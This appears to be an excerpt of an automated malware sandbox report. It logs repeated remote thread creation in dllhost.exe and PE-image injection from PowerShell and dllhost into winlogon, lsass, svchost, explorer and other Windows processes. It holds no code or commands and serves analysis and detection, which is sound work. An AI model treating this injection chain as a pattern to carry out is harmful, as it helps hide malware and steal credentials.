Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D7752EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DCD42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 138D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D7E02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5F032EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4E72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D7752EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DCD42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 138D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D7E02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5F032EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4E72EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\wbem\WMIADAP.exe EIP: E5E22EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4EE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC522EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC552EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 65092EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F0522EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\Conhost.exe EIP: 15D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F2842EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E612EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E642EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\Conhost.exe EIP: D6712EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 37402EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E3D52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FE072EBC
Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAED80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEDB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADECD70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B47B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20870060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17184260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 32F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 32F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F560310000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 195E2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 195E2560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C4C590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C4C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18DCC7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18DCCA00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 14D83F10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 14D83F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B927020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B927050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE31080000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE310B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7C0000 value starts with: 4D5A
